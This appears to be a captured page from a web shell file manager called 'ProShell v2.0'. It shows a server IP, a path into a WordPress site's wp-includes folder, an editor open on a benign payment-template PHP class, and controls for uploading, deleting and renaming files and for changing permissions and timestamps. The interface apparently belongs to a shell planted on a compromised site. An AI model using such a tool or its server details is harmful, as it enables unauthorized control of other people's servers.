ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-18 03:33:02
Editing: HtmlTemplate.php
Cancel
Save Changes
<?php /** * Display html template to continue payment * @package Am_Paysystem */ class Am_Paysystem_Action_HtmlTemplate implements Am_Paysystem_Action { protected $_template; public function __construct($template) { $this->_template = $template; } public function process(Am_Controller $action = null) { $action->view->assign($this->getVars()); $action->renderScript($this->_template); } function getVars() { $ret = array(); foreach ($this as $k => $v) if ($k[0] != '_') $ret[$k] = $v; return $ret; } public function toXml(XmlWriter $x) { $x->startElement('template');$x->text($this->_template);$x->endElement(); $x->startElement('params'); foreach ($this->getVars() as $k => $v) { $x->startElement('param'); $x->writeAttribute('name', $k); $x->text($v); $x->endElement(); } $x->endElement(); } }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete